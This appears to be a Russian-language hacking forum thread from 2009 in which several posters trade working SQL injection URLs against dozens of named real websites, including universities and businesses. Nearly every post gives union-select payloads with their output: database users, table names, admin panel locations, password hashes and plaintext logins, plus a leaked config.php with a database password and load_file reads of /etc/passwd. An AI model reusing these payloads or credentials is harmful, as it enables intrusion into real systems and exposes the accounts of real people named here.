» ru_comments (7)
» ru_rnb (10)
» ru_tracks (34)
» showed (29444)
» showed_celebs (1123)
» showed_myphotos (4235)
» subscr (153)
» test (1)
» testing (0)
» tracks (195)
» u2u (1)
» users (6873)
» videos (78)
» week_chart (1018)
» xmb_attachments (428)
» xmb_banned (46)
» xmb_buddys (342)
» xmb_captchaimages (14049)
» xmb_favorites (2127)
» xmb_forums (26)
» xmb_logs (1929)
» xmb_members (10092)
» xmb_posts (410819)
» xmb_ranks (10)
» xmb_regimages (0)
» xmb_restricted (6)
» xmb_settings (1)
» xmb_smilies (74)
» xmb_templates (199)
» xmb_themes (1)
» xmb_threads (24808)
» xmb_u2u (36507)
» xmb_vote_desc (1650)
» xmb_vote_results (2538)
» xmb_vote_voters (6188)
» xmb_whosonline (33)
» xmb_words (4)
Юзвери(около 6,5к):
Логин:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,name,3,4,5,6,7+from+users--
Пасс:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,pass,3,4,5,6,7+from+users--
Админ:
Ник:Altero
Пасс:kexik408
Форум:
Ник:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,username,3,4,5,6,7+from+xmb_mem bers--
Пасс:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,password,3,4,5,6,7+from+xmb_mem bers--
Админка www.rnb-music.ru/admin
Доступ по айпи(
PR:2
ТиЦ:240
config.php
<?php
if (!defined('IN_CODE')) {
exit("Not allowed to run this file directly.");
}
$dbname = 'altero_rnb'; // Name of your database
$dbuser = 'altero_rnb'; // Username used to access it
$dbpw = 'a12345'; // Password used to access it
$dbhost = 'localhost'; // Database host, usually 'localhost'
$database = 'mysql'; // Database type, currently only mysql is supported.
$pconnect = 0; // Persistent connection, 1 = on, 0 = off, use if 'too many connections'-errors appear
// Table Settings
$tablepre = 'xmb_'; // Table-pre
// Path-settings
// In full_path, put the full URL you see when you go to your boards, WITHOUT the filename though!!
// And please, don't forget the / at the end...
$full_url = 'http://rnb-music.ru/konfa/';
// Other settings
// There are situations where you don't want to see the <!-- template start: index -->...<!-- template end: index -->
// tags around each template. In those cases, change the following to false, or true to turn it back on.
// Default value: false;
$comment_output = true;
// Alternative mailer
// some hosts prevent the direct use of sendmail, which php uses to send out emails by default.
// To get around this, we have included code which will contact a separate SMTP server of your
// choice, and will send the mail trough that. The following mailer-options are available:
// 'default' => php's internal mail() function. No additional values need to be set:
// (does not require a username/password/host/port)
// 'socket_SMTP' => a connection to the SMTP server trough sockets. Requires the username,
// password, host and port values to be entered correctly to work.
$mailer['type'] = 'default';
// mailer-options (for socket_SMTP only, currently)
$mailer['username'] = 'MAILER_USER';
$mailer['password'] = 'MAILER_PASS';
$mailer['host'] = 'MAILER_HOST';
$mailer['port'] = 'MAILER_PORT';
// Plugin Settings
$i = 1;
// Plugins are the links in the navigation part of the Header. Plugins built-in by default include Search, FAQ, Member List, Today's Posts, Stats and Board Rules.
// To add extra plugins (links of your own), just edit the code between Start Plugin Code and End Plugin Code. If you with to add more than one, simply copy that block, paste it and add the second one.
// Start Plugin code
$plugname[$i] = ''; // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
$plugurl[$i] = ''; // This is the location, link, or URL to the plugin
$plugadmin[$i] = false; // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
$plugimg[$i] = ''; // This is the path (full URL) to the image to show in front of the text.
$i++;
// End plugin code.
// Start Plugin code for plugin #2
$plugname[$i] = ''; // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
$plugurl[$i] = ''; // This is the location, link, or URL to the plugin
$plugadmin[$i] = false; // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
$plugimg[$i] = ''; // This is the path (full URL) to the image to show in front of the text.
$i++;
// End plugin code for plugin #2
// To make multiple plugins, copy and paste this plugin-code, so you have multiple entries.
// Registration settings
/***************
* The ipcheck, checks if your IP is a valid IPv4 or IPv6 type, if none of these, it will kill.
* this might shut a few users out, so you can turn it off by changing the $ipcheck variable to 'off'
****************
* The allow_spec_q variable specifies if Special queries (eg. USE database and SHOW DATABASES) are allowed.
* By default, they are not, meaning $allow_spec_q = false;
* To allow them, change $allow_spec_q to true ($allow_spec_q = true;)
****************
* The show_full_info variable lets you decide wether to show the Build and Alpha/Beta/SP markings in the HTML or not.
* Change the value to true to show them, or false to turn them off.
* Default = true;
****************/
$ipcheck = 'off';
$allow_spec_q = true;
$show_full_info = false;
define('DEBUG', false);
// define('DEBUG', true);
?>
[PR 4]
http://www.opaloman.org/data.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8--
4.1.20:db_opaloman:opal_oman@localhost
[PR 2]
http://www.host-park.ru/data.php?id=-10+union+select+concat_ws(0x3a,version(),database( ),user()),2,3--
5.0.45-community:db_hostpark1:hostpark1@localhost
[PR 1]
http://www.corecta.com/prestige/data.php?id=-2063+union+select+concat_ws(0x3a,version(),databas e(),user())
4.0.27-icd1-log:corectadb:prestige@localhost
[PR 0]
http://www.city-site.com.ua/data.php?m=1&cat=1&subcat=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2--
5.0.22:citysite_inf:citysite_red@localhost
HAXTA4OK
05.05.2009, 17:54
PR: 6
http://ume.ensta.fr/biblio/show.php?id=-1'+union+%20select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,concat_ws(0x3a,version(),d at abase(),use r()),40,41,42,43,44,45/*
5.0.22-log:bibume:rootume@localhost
http://ume.ensta.fr/biblio/show.php?id=-1'+union+%20select+1,2,3,4,table_name,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,table_name,40,41, 42,43,44,45+from+information_schema.tables/*
bib_user
admin:50ea881c822098a867b5643eed614825 :(
------------------------------------------------------------------------
PR: 5
http://www.lorin.fr/produits-categoriesenglish.php?ID=-1+union+select+1,2,concat_ws(0x3a,ver sion(),database(),u ser()),4,5,6--
4.0.25-standard-log:lorinlorin:lorinlorin@10.0.64.123
.:[melkiy]:.
05.05.2009, 18:14
http://www.policlinicagipuzkoa.com/conferencia.php?idioma=eu&id=-3+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.27-log
Database name: poligipzk
User name: poligipzk@albergue-unix.sarenet.es
http://www.ceskatelevize.cz/program/pokr/?idp=10213389625&page=strukturalni-fondy-eu&id=-3+union+select+1,2,3,4,5,6--
Database Version: 5.0.77-log
Database name: podnikatelsky_servises
User name: podniservi@10.1.0.14
http://www.bsl-med.ru/?todo=news&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67-log
Database name: u179055
User name: u179055@10.10.153.189
root:32f82a1f2e69453c3356be43ef06d8cc
Админка:
http://bsl-med.ru/admin/
HAXTA4OK
05.05.2009, 19:02
http://aramis.obspm.fr/HORIZON/php/abstracts.php?id=-1+union+select+1,concat_ws(0x3a,vers ion(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23--
4.0.16-standard:horizon:combes@localhost
Skofield
05.05.2009, 19:05
http://www.che.gatech.edu {PR 5}
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94,95,96--
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84, 85,86,87,88,89,90,91,92,93,94,95,96--
5.0.77:dynabot2:dbread@dot.chbe.gatech.edu
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96+from+information_schema.tables--
-m0rgan-
05.05.2009, 19:36
ТИЦ - 40
PR - 4
http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,concat_ws(0x3a,user,passwo rd,file_priv)%20,4,5,6,7,8+from+mysql.user--+
User info:
root:141091821ee9bcaa:Y
http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,CONCAT_WS(CHAR(32,58,32),u ser(),database(),version()),4,5,6,7,8+from+mysql.u ser--+
db info:
volex@1-srv.geostroi.ru : geostroy : 4.0.12-max-nt
Admin panel:
www.geostroy.ru/admin
Skofield
05.05.2009, 19:59
http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*
5.0.32-Debian_7etch1-log:cid:infocruz@scplweb.santacruzpl.org
http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+group_concat(username,0x3a,password )+from+users/*
Ann:2eb586417e7befa2
morrisr:42687b1e579d2f2c
deckerg:45ab966f48704ded
czarneckij:0560dafa54fc2cd5
jessb:40fbb0380a8eb49c
stephensd:0e0cc804789ea146
Skofield
05.05.2009, 20:14
http://www.gcuc.edu.gh/ (PR 4)
http://www.gcuc.edu.gh/academics.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3/*
4.1.22-standard-log : gardenc_db : gardenc_user@216.219.95.52
users
http://www.gcuc.edu.gh/academics.php?id=-1+union+select+1,group_concat(username,0x3a,passwo rd),3+from+users/*
http://www.universalrights.net/news/display.php?id=5101+UNION+SELECT+1,AES_DECRYPT(AES _ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,Use r()),0x71),0x71),3,4,5,6,7,8,9,10,11,12+LIMIT+1,1/*
by 4.1.9-nt:universalrights:AU20024480@localhost
http://www.satyalife.net/articles-display.php?id=-16+union+select+1,2,concat(user(),0x3a,version(),0 x3a,database()),4,5/*
satyalife_cms@blade1.euronic.fi:5.0.32-Debian_7etch5-log:domainkeskus_satyalife_cms
админка
http://www.universalrights.net/login.php
pass:login
admin:admin
)))
winstrool
05.05.2009, 20:27
http://www.jjwxc.net/topten.php?orderstr=1&timeid=-22+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6--
4.0.27-hi4-log:selfnovel:monty@10.9.10.108
сайт китайцев вроде, япану мать))
-m0rgan-
05.05.2009, 20:41
http://namnaren.ncm.gu.se/artikelregister/detail.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),us er(),database(),version()),3,4,5,6,7,8,9,10--
db info:
root@localhost : nbaspub : 5.1.33-log
http://www.opcli.org/display.php?id=4+union+select+1,2,3,4+limit+1,1/*
Database Version: 4.0.27-standard-log
Database name: main2_opcli_org
User name: opcliorg24931052@216.251.35.194
HAXTA4OK
05.05.2009, 21:09
http://www.avocat-lecroq.fr/actualite.php?id=1+union+select+1,concat_ws(0 x3a,version(),databas e(),user()),3,4,5,6,7--
5.0.67-0.dotdeb.1-log:idep_lecroqavocats:lecroqavocats@10.0.31.12
http://www.avocat-lecroq.fr/actualite.php?id=1+union+select+1,column_name,3,4, 5,6,7+from+infor mation_schema.column s+where+table_name=0x7573657273--
колонки таблицы Users тока потом инфу вытащить не могу, крутите кто хочет)
DezMond™
05.05.2009, 21:10
http://edu.e-drugdiscovery.com/qna/qna_edit.php?idx=-45365+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
-m0rgan-
05.05.2009, 21:10
http://www.agro-biz.com.ar/control_roya/news_view.php?id=-1+union+all+select+0,1,CONVERT(CONCAT_WS(CHAR(32,5 8,32),user(),database(),version())%20USING%20latin 1),3,4,5,6,7,8,9--
db info:
tandem@linux.sistemat.com.ar : agrobiz : 4.1.10a-Max
DezMond™
05.05.2009, 21:32
Едааа
http://www.psych.upenn.edu/people_info.php?id=-150+union+select+1,2,3,4,version()/*
4.0.12
BlackPanther
05.05.2009, 21:35
Site: http://www.auc.ca
SQL -
http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,concat_ws(CHAR(32,58,32 ),user(),database(),version()),5--
ВЫдает***algomauniversity@205.207.185.75 : algomauniversity : 5.0.19-standard
Далее Таблицы:
http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,group_concat(table_name ),5+from+information_schema.tables--
Таблица которая выдаст результаты***modcentre_users
Пункты в таблице modcentre_users***user_id, password, name, email, access, note
Выходит такая ссыль:
http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,concat(0x3a,user_id,0x3 a,0x3a,0x3a,password,0x3a,name,0x3a,email),5+from+ modcentre_users--
И вот конечные результаты*Юзеры
admin:::iamroot32:Administrator: : 3 - админ
5
:dgold:::dav1dg01d:David Gold:dgold@algomau.ca : 3
5
:bteller:::relletb:Bev Teller: : 3
5
:sharnden:::ykj455:Sue Harnden: : 3
5
:rlinklater:::rlink45:Rose Linklater: : 3
5
:jnanne:::p6a6k8:J. Nanne:joanne.nanne@algomau.ca : 3
5
:dloosemore:::dl34cv:Deborah Loosemore: : 3
5
:marasco:::ratt24:Dave Morasco: : 3
5
:kpearson:::hmrobbins:Krista Pearson:Krista.Pearson@algomau.ca : 3
5
:mikey:::dr1v3ll:Michael Young:michael.young@algomau.ca : 3
5
HAXTA4OK
05.05.2009, 22:05
http://sparvy.free.fr/cv/showcv.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30--
5.0.67:SPARVY:SPARVY@172.20.245.36
короче при поиске таблиц кидает ошибку =\
------------------------------------------------------------------------
http://artistlikeourselves.com/alo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,v ersi on(),data base(),user()),28/*
4.0.27-standard-log:db195527007:dbo195527007@74.208.16.30
------------------------------------------------------------------------
PR:7
попробуй прочитай
http://www.ktp.gr/am.php?id=1+union+select+1,2,concat_ws(0x3a,versio n(),database(),user()),4--
5.0.45-log:ktp_new:root@localhost
http://www.ktp.gr/am.php?id=1+union+select+1,2,concat_ws(0x3a,table_ name,0x3a),4+from+information_schema.tables--
это жесть сайт, а скока таблов =\
_SEREGA_
05.05.2009, 23:02
скуль:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,2,3,4,5,6--
версия:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,version(),3,4,5,6--
4.0.25 =(
infa:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,concat_ws(0x3a,user(),database() ),3,4,5,6--
user() thieder@localhost
database() thieder
HAXTA4OK
05.05.2009, 23:15
http://www.tvsat.gr/static.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2--
5.0.77-community:tvsat_dorif:tvsat_root@localhost
PR: 2
_SEREGA_
05.05.2009, 23:38
скуль:
http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,2,3,4,5--
версия:
http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,version(),3, 4,5--
4.1.22
infa:
http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,concat_ws(0x 3a,user(),database()),3,4,5--
user() videodem@localhost
database() netevents
HAXTA4OK
05.05.2009, 23:40
http://www.hcmr.gr/english_site/news/latest/hot_topics/show_hot.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),user ()),3,4,5,6,7,8--
5.0.33-log:hot_topics:public@localhost
ТИЦ: 20
PR: 7
_SEREGA_
05.05.2009, 23:52
скуль:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,2--
версия:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,version()--
5.0.27-standard
таблицы выводятся limit'om:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,table_name+from+information_sche ma.tables--
столбцы выводятся limit'om:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,column_name+from+information_sch ema.columns--
infa:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,concat_ws(0x3a,user(),database() )--
user() slatsvideo2@209.217.33.21
database() slatsvideo2
http://board.2mcl.com/board/mod/full.php?id=-1'+un ion+all+select+0,1,2,concat_ws(0x3a,ver sion(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18/*
4.1.22:board2mclcom:board@localhost
DezMond™
06.05.2009, 00:19
http://synlab.gatech.edu/project.php?id=-61+union+select+1,version(),3,4,5,6,7,8/*
5.0.45
winstrool
06.05.2009, 09:34
https://secure.vortec.com/store_products.php?catID=31&prodID=89+union+select+1,2,3,4,5,6,7,concat_ws(0x3 b,version(),user(),database()),9,0,11,12,13,14,15, 16,17,18,19,0,21,22+--
5.0.67-log;vortec_user@209.173.135.197;vortec_db
_SEREGA_
06.05.2009, 09:35
скуль:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,2,3,4,5,6--
версия:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,version(),3,4,5,6--
5.0.51-log
таблицы выводятся limit'om:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables--
столбцы выводятся limit'om:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,column_name,3,4,5,6+from+informa tion_schema.columns--
infa:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,concat_ws(0x3a,user()),3,4,5,6--
user() dbo228987490@74.208.16.88
winstrool
06.05.2009, 11:44
_http://www.palaver.se/page.php?catid=-92+union+select+1,2,3,concat_ws(0x3b,version(),use r(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,00,1
5.0.32-Debian_7etch10-log;palaver_se@srv26.one.com;palaver_se
_http://www.dhool.com/sotd2/catlist.php?catid=21+union+select+unhex(hex(concat _ws(0x3b,version(),user(),database()))),2
4.1.14;dhooluser@localhost;dhooldb
_http://www.stranadetstva.ru/osnov.php?idraz=-3+union+select+1,concat_ws(0x3b,version(),user(),d atabase())+--
5.0.33;us4320a@localhost;db4320a
admin:44f9e86198d1693e603ba7303b76a460
_SEREGA_
06.05.2009, 11:49
скуль:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,2,3,4,5,6,7,8--
версия:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,version(),3,4,5,6,7,8--
5.0.67-log
таблицы выводятся limit'om:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables--
столбцы выводятся limit'om:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,column_name,3,4,5,6,7,8+from+inf ormation_schema.columns--
infa:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,concat_ws(0x3a,user(),database() ),3,4,5,6,7,8--
user() upadb@smithers.dreamhost.com
database() upa
HAXTA4OK
06.05.2009, 12:50
http://www.touristicunion.gr/default.php?id=-1'+union+select+1,2,@@ver sion,4,5,6,7/*&lan g=en
5.0.45 дальше стена =\
PR: 4
------------------------------------------------------------------------
http://www.corfuhouse.gr/real_estate.php?lang=en&id=1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,v ersion(),database (),u ser()),10,11,12,13,14,15,16,17,18--
4.0.26:corfuhouse_gr:corfuhou@localhost
------------------------------------------------------------------------
халява фм в греции
PR: 4
http://www.freefm.gr/new.php?id=-1+union+select+1,concat_ws(0x3a,versi on(),datab ase(),user()),3,4--
5.0.67-community:free98_fr98:free98_freefm@localhost
http://www.freefm.gr/new.php?id=-1+union+se lect+1,group_concat(table_name),3,4+from +information_schem a.tables+group+by+table_schema--
таблы:
links,sunday,downloads,monday,thursday,events,news ,tuesday,friday,saturday,wednesday
erihtoney
06.05.2009, 13:49
Опять Грузия (
http://internet.ge/v2/index.php?action=catalogue&catid=4444444444444&start=1+union+select+1,2,3,4,5,6,concat_ws(char(58 ),username,password),8,9,10,11,12,13,14,15,16,17,1 8,19,
20,21,22+from+stat.users/*
HAXTA4OK
06.05.2009, 13:56
http://www.dipyl on.gr/main.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),us er()),3,4--
5.0.67-community:dipylon_main:dipylon_mainuser@localhost
http://www.dipylon.gr/main.php?id=-1+union+select+1,group_concat(table_name),3,4+from +information_schema.tables+group+by+table_schema--
Одна тока табла =\ :
d_partners
HAXTA4OK
06.05.2009, 13:59
PR: 3
http://www.cinematic.gr/link_en.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,ver sion(),datab ase(),user()),8,9--
4.1.22-standard-log:cinemati_admin:cinemati_admin1@localhost
------------------------------------------------------------------------
Опять Грузия (
http://internet.ge/v2/index.php?action=catalogue&catid=4444444444444&start=1+union+select+1,2,3,4,5,6,concat_ws(char(58 ),username,password),8,9,10,11,12,13,14,15,16,17,1 8,19,
20,21,22+from+stat.users/*
а где скуля ? =\ доработай скулю, или я просто туплю? =\
winstrool
06.05.2009, 14:35
_http://www.indmedica.com/specialities.php?catid=-16+union+select+1,version(),3,4,5+--
5.0.45;indmedica@localhost;indmedica
_http://www.kargah.com/names.php?catid=-5+union+select+1,2,concat_ws(0x3b,version(),user() ,database()),4,5,6,7,8,9,0,1,12+--
4.1.22-standard;kargahc_kargah@localhost;kargahc_host002
[PR 4]
http://www.emergentarchitecture.com/about_analogies.php?id=-42+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6--
5.0.67-log:twisco_emergentdb:twisco_r@209.68.2.65
erihtoney
06.05.2009, 16:55
http://www.utsg.net/publication.php?Year=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x3a,version(),user(),database()),30
[info]
version:4.0.27-max-log
user:dbo127835715@212.227.119.144
database:db127835715
[users]
http://www.utsg.net/publication.php?Year=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(use rname,0x3a,password),30+from+users--
Разработка, продвижение и обслуживание интернет-сайтов.
http://www.vikki-di.ru/show.php?id=-54+union+select+1,concat(table_name,0x3a,table_row s),3,4,5,6,7,8,9,0,11,12,13,14,15,16+from+informat ion_schema.tables--
<<OAO "Катод">>
http://www.katodnv.ru/print_doc.php?ID=-8)+union+select+concat_ws(0x3a2a3a,version(),datab ase(),user(),@version_compile_os)--+
5.0.32-Debian_7etch10-log:*:katodnv_ru:*:katodnv_ru@localhost
http://www.katodnv.ru/admin - бейсик авторизация
HAXTA4OK
06.05.2009, 21:19
PR: 3
http://www.paraschis.gr/review.php?id=1+union+select+1,2,3,4,5,6,7,8,9,con cat_ws(0x3a,version(),databa se(),us er()),11--
4.1.22-standard:spyros_site:spyros_site@localhost
------------------------------------------------------------------------
PR: 3
http://www.silverwings.gr/main/detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10--
5.0.67-community:swings_silverwings:swings_georgek@localh ost
-------------------------------------------------------------------------
PR: 5
Академия Компьютерных технологий гг
http://ru6.cti.gr/ru6/projects_view.php?id=-1+union+select+concat_ws(0x3a,version(),databas e(),use r()),2,3,4,5,6,7,8,9,10,11,12--
5.0.27:ru6:siteru6@localhost
http://ru6.cti.gr/ru6/projects_view.php?id=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12+from+information_schema. tables+gr oup+by+ table_schema+limit+1,1--
таблы :
projects,people,pub_category,people_info,links,pub _n_auth,pr_n_par,news,publications,pr_n_pub,partne rs
PR 6
http://www.bored.com/drawthings/save.php?id=-2308041+union+select+1,2,3
Database Version: 5.0.51-log
Database name: drawthin_bored
User name: drawthin@web2.bored.com
Skofield
06.05.2009, 22:14
http://www.todocontenidos.com/Tema.php?Id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.1.22-standard : todocont_conte : todocont_conte@localhost
Skofield
06.05.2009, 22:46
http://www.cafedelmarcommunity.com/las_rozas_village/index_2.php?id=-1+union+select+1,2,3,4,5,6/*
HAXTA4OK
06.05.2009, 22:57
PR: 4
http://www.rent4day.am/template.php?lang=3&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),databa se(),use r())--
4.1.22-standard-log:rent4day_rent4day:rent4day_rent@localhost
------------------------------------------------------------------------
ТИЦ: 10
PR: 6
http://www.agbu.am/index.php?p=ysip&id=-1+union+select+1,2,3,concat_ws(0x3a, version(),datab ase(),user()),5,6,7,8,9,10,11,12--
5.0.67-community-log:agbuam_agbu:agbuam@localhost
http://www.agbu.am/index.php?p=ysip&id=-1+union+select+1,2,3,group_concat(table_name),5,6, 7,8,9,10,11,12+from+information_schema.tabl es+grou p+by +table_schema--
таблы :
ypy,images,admin,ysip,news,attachments,projects,do nations,videos,gallery
http://www.agbu.am/index.php?p=ysip&id=-1+union+select+1,2,3,group_concat(column_name),5,6 ,7,8,9,10,11,12+from+information_schema.columns+wh ere+table_name=0x61646d696e--
колонки в табле admin:
ID,username,passwd,email
admin :
ID username passwd email
1:agbu.am:ugab2007:admin@agbu.am
DezMond™
06.05.2009, 23:28
http://fieam.locaweb.com.br/senai/noticia.php?idN=-159+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
5.0.41-community
http://www.cubalibredigital.com/noticia.php?id=19478'+union+select+1,2,3,4,5,6,7,8 ,9/*
http://www.adrianomoraes.com/siteam/index.php?lang=eng&do=pbrNoticias&id=-1543'+union+select+1,2,3,4,5,6,7/*&PHPSESSID=94c4qfic3c49aqpohaapedgie6
И еду ПР5))
http://economics.wustl.edu/courses/courses.php?sem=sp09+union+select+table_name,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+informa tion_schema.tables+--+
HAXTA4OK
06.05.2009, 23:32
http://www.quadrat.am/news_ds.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da ta base(),use r()),6,7--
5.0.51a-community-nt:quadrat:root@localhost
mailbrush
06.05.2009, 23:47
http://www.sabahtourism.com/en/event.php?readID=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22+from+mysql.user&rd=true&do=readmore
belalang@localhost:diana:5.0.51a-log
http://www.sabahtourism.com/en/event.php?readID=-1+union+select+1,concat_ws(0x3a,user,password,file _priv),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22+from+mysql.user&rd=true&do=readmore
root:509492793f8aed39:Y
http://www.sabahtourism.com/en/event.php?readID=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22&rd=true&do=readmore
/etc/passwd
http://www.sabahtourism.com/en/event.php?readID=-1+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22+from+mysql.user&rd=true&do=readmore
httpd.conf
Next...
http://www.web-gr.net/webdirectory/index.php?id=26+and+1=0+union+select+1,2,concat_ws (0x3a,user(),database(),version())webgrn80_jsalata @localhost:webgrn80_webgr:5.0.67-community
http://www.controlenggcollege.org/main.php?ID=9&InstituteId=10+union+select+1,2,3,4/*
Database Version: 5.0.18-nt
Database name: technogroup
User name: technogroup@localhost
HAXTA4OK
07.05.2009, 00:28
http://aviagit.am/hotels.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(), user()),7--
5.0.67-community-log:aviagit_aviagit:aviagit_aviagit@localhost
http://aviagit.am/hotels.php?id=-1+union+select+1,2,3,4,5,group_concat(table_name), 7+from+information_schema.tables+group+by+tab le_schema+lim it+0,1--
Таблы:
template1,top_images,hotels
_SEREGA_
07.05.2009, 01:57
скуль:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,2,3,4,5,6,7--
версия:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,version(),3,4,5,6,7--
5.0.68-log
таблицы выводятся:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,table_name,3,4,5,6,7+from+inform ation_schema.tables--
столбцы выводятся:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,column_name,3,4,5,6,7+from+infor mation_schema.columns--
infa:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,concat_ws(0x3a,user(),database() ),3,4,5,6,7--
user() Sql138934@62.149.141.80
database() Sql138934_1
Lam3rsha
07.05.2009, 02:18
http://www.mariatk.ru/catalog.htm?cat_id=30+union+select+user(),2/*
Database Version: 4.0.27
Database name: mariya
User name: root@pm3.zenon.net
Assembler
07.05.2009, 06:28
http://www.tsarichanska.com/page.php?pn=-99999999999%20union%20select%20table_name%20%20fro m%20information_schema.tables%20limit%2019,1--
5.0.67 log
DezMond™
07.05.2009, 11:52
